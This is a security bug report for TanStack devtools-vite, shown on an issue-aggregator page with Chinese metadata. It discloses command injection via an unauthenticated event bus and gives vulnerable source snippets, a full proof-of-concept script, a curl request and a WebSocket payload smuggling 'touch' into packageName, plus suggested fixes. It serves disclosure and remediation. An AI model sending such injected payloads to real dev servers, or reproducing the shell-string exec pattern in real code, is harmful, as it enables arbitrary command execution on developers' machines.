Unauthenticated devtools event can trigger shell command injection during package install
評估
- 難度
- 4/5
- 預估耗時
- 3-5 天
- 新手友好度
- 52/100
- Issue 類型
- 缺陷
- 描述清晰度
- 描述清楚
- 活躍度
- 活躍
- 技術堆疊
- node.js, typescript, vite
研究方向
從 packages/devtools-vite/src/package-manager.ts 和 packages/devtools-vite/src/plugin.ts 開始,追蹤 packageName 進入安裝流程的路徑,然後檢查 packages/devtools-event-bus/src/server/server.ts 中對未驗證訊息的處理。使用提供的 Vite 專案重現此問題,並驗證對於 install-devtools 和 bump-package-version 事件,注入的 shell 語法不再執行。
由索引模型根據 Issue 內容生成。
描述
TanStack Devtools version
@tanstack/[email protected]
Framework/Library version
Vite v8.0.16 Node.js v24.3.0 macOS / Darwin arm64
Describe the bug and the steps to reproduce it
@tanstack/[email protected] appears to allow command injection through the development devtools event bus.
When the Vite plugin runs in development mode, it starts a TanStack Devtools event bus, normally on localhost:4206, and registers handlers for events such as install-devtools and bump-package-version.
Those handlers trust the event payload's packageName value and pass it into installPackage(). installPackage() then builds a package-manager shell command string such as:
npm install -D ${packageName}
pnpm add -D ${packageName}
yarn add -D ${packageName}
bun add -D ${packageName}
The command is executed with child_process.exec(). Because packageName is not validated, escaped, or passed as an argv element, shell metacharacters in the event payload can execute local commands in the Vite dev server process.
Relevant source locations:
packages/devtools-vite/src/plugin.ts
packages/devtools-vite/src/package-manager.ts
packages/devtools-event-bus/src/server/server.ts
The Vite plugin starts the event bus:
const preferredPort = args?.eventBusConfig?.port ?? 4206
const serverHost =
typeof server.config.server.host === 'string'
? server.config.server.host
: 'localhost'
const bus = new ServerEventBus({
...args?.eventBusConfig,
port: preferredPort,
host: serverHost,
})
devtoolsPort = await bus.start()
The same plugin registers package-installation handlers:
devtoolsEventClient.on('install-devtools', async (event) => {
const result = await installPackage(event.payload.packageName)
...
})
devtoolsEventClient.on('bump-package-version', async (event) => {
const { packageName, minVersion } = event.payload
const packageWithVersion = minVersion
? `${packageName}@^${minVersion}`
: packageName
const result = await installPackage(packageWithVersion)
...
})
The command injection sink is:
const getInstallCommand = (
packageManager: string,
packageName: string,
): string => {
switch (packageManager) {
case 'yarn':
return `yarn add -D ${packageName}`
case 'pnpm':
return `pnpm add -D ${packageName}`
case 'bun':
return `bun add -D ${packageName}`
case 'npm':
default:
return `npm install -D ${packageName}`
}
}
export const installPackage = async (packageName: string) => {
...
const installCommand = getInstallCommand(packageManager, packageName)
...
exec(installCommand, async (installError) => {
...
})
}
The event bus forwards unauthenticated WebSocket messages to server-side listeners:
ws.on('message', (msg) => {
const data = parseWithBigInt(msg.toString())
this.emitToServer(data)
})
Steps to reproduce:
rm -rf /tmp/tanstack-devtools-vite-poc
mkdir /tmp/tanstack-devtools-vite-poc
cd /tmp/tanstack-devtools-vite-poc
npm init -y >/dev/null
npm install vite @tanstack/[email protected] >/dev/null
cat > vite.config.mjs <<'JS'
import { defineConfig } from 'vite';
import { devtools } from '@tanstack/devtools-vite';
export default defineConfig({
plugins: [
...devtools({
logging: false,
}),
],
});
JS
cat > index.html <<'HTML'
<div id="app">tanstack devtools vite poc</div>
<script type="module" src="/src/main.js"></script>
HTML
mkdir -p src
cat > src/main.js <<'JS'
console.log('tanstack devtools vite poc');
JS
rm -f /tmp/tanstack-devtools-vite-pwn
NODE_ENV=development npx vite --host localhost --port 5173 > /tmp/tanstack-vite.log 2>&1 &
VITE_PID=$!
sleep 2
node --input-type=module <<'JS'
import { WebSocket } from 'ws';
const ws = new WebSocket('ws://localhost:4206/__devtools/ws');
ws.on('open', () => {
ws.send(JSON.stringify({
type: 'tanstack-devtools-core:install-devtools',
pluginId: 'tanstack-devtools-core',
payload: {
packageName: 'definitely-not-a-real-tanstack-poc-package; touch /tmp/tanstack-devtools-vite-pwn; #',
pluginName: 'PocPlugin',
pluginImport: {
importName: 'PocPlugin',
type: 'jsx'
}
}
}));
setTimeout(() => ws.close(), 500);
});
setTimeout(() => process.exit(0), 1500);
JS
sleep 5
test -f /tmp/tanstack-devtools-vite-pwn && echo "VULNERABLE: marker created"
kill "$VITE_PID" 2>/dev/null || true
sed -n '1,80p' /tmp/tanstack-vite.log
Observed output:
VULNERABLE: marker created
[@tanstack/devtools-vite] Installing definitely-not-a-real-tanstack-poc-package; touch /tmp/tanstack-devtools-vite-pwn; #...
[@tanstack/devtools-vite] Successfully installed definitely-not-a-real-tanstack-poc-package; touch /tmp/tanstack-devtools-vite-pwn; #
[@tanstack/devtools-vite] Auto-adding definitely-not-a-real-tanstack-poc-package; touch /tmp/tanstack-devtools-vite-pwn; # to devtools...
[@tanstack/devtools-vite] Could not add plugin. Devtools file not found.
The marker file is created, showing that the shell parsed and executed the injected command.
I also reproduced the same issue through the HTTP event endpoint:
curl -X POST http://localhost:4206/__devtools/send \
-H 'Content-Type: application/json' \
--data '{"type":"tanstack-devtools-core:install-devtools","pluginId":"tanstack-devtools-core","payload":{"packageName":"x; touch /tmp/tanstack-devtools-vite-pwn; #","pluginName":"PocPlugin","pluginImport":{"importName":"PocPlugin","type":"jsx"}}}'
Impact:
I understand this package is intended for development tooling, so I would not describe this as a production application RCE. The narrower issue is that an unauthenticated local devtools event endpoint can trigger package-manager command execution with attacker-controlled shell syntax.
By default this is primarily a local development server risk. However, development servers often have access to source code, package-manager auth tokens, local environment variables, dependency credentials, and the developer's filesystem. The risk can also increase if the dev server/event bus is exposed through server.host, a tunnel, a container port mapping, or a shared development environment.
Suggested fix:
- Avoid constructing package-manager commands as shell strings.
- Use
spawn()orexecFile()withshell: false, passing the package name as a separate argv element. - Validate package names with a package-name parser such as
npm-package-arg, or restrict this event to a known allowlist of TanStack devtools packages. - Require a per-dev-server random token for mutating event-bus actions.
- Check WebSocket
Originwhere possible. - Avoid
Access-Control-Allow-Origin: *for mutating event endpoints. - Consider requiring explicit user confirmation before package-install actions.
Your Minimal, Reproducible Example - (Sandbox Highly Recommended)
The reproduction above is a complete local shell script. It creates a minimal Vite project from scratch, installs only vite and @tanstack/[email protected], starts the dev server, sends the event payload, and checks for the marker file.
Screenshots or Videos (Optional)
No response
Do you intend to try to help solve this bug with your own PR?
No response
Terms & Code of Conduct
- I agree to follow this project's Code of Conduct
- I understand that if my bug cannot be reliable reproduced in a debuggable environment, it will probably not be fixed and this issue may even be closed.
- 主要語言
- TypeScript
- 星號
- 501
- 分支
- 101
- 平均合併
- 1 天 8 小時
- 30 天內合併 PR
- 4
環境準備
- 沒有 Dockerfile 或 Docker Compose 檔案
- 有 Pull Request 範本
- 閱讀貢獻指南
從這裡開始
- 先讀完整個 Issue,再讀專案的貢獻指南。
- 在 Issue 下留言說明你要接手 —— 這能避免兩個人做同樣的事。
- Fork 儲存庫,在一個分支上完成修改。
- 送出 Pull Request,並在描述裡引用這個 Issue 編號。
TanStack/devtools 的其他 Issue
-
`intent` bin conflicts with @tanstack/intent and imports removed subpath可能已有人在做 @AlemTuzlak 於 4 天前認領。 未關閉
難度 2/5 1-3 小時 新手友好度 78/100
-
devtools-ui 0.7.0 breaks SSR boot with solid-js <=1.9.12: `use` is not exported by solid-js/web server build可能已有人在做 @AlemTuzlak 於 4 天前認領。 未關閉
難度 2/5 1-3 小時 新手友好度 75/100
-
data-tsd-source inject-source plugin causes hydration mismatch in SSR (TanStack Start)可能已有人在做 @AlemTuzlak 於 4 天前認領。 未關閉
難度 2/5 1-3 小時 新手友好度 78/100
-
Pre-bundled client ignores the event bus port from devtools-vite可能已有人在做 @AlemTuzlak 於 4 天前認領。 未關閉
難度 3/5 1-2 天 新手友好度 76/100
-
難度 2/5 1-3 小時 新手友好度 52/100
查看 TanStack/devtools 的全部 Issue
相似的 Issue
-
難度 2/5 1-3 小時 新手友好度 83/100
維護者通常 1 天內回覆
-
難度 2/5 1-3 小時 新手友好度 75/100
維護者通常 1 天內回覆
-
難度 2/5 1-3 小時 新手友好度 68/100
維護者通常 1 天內回覆
-
難度 2/5 1-3 小時 新手友好度 85/100
platformatic/mcp#208 ·
維護者通常 1 天內回覆
-
🐛 bug
難度 2/5 1-3 小時 新手友好度 66/100
margelo/react-native-vision-camera#4211 ·
維護者通常 4 天內回覆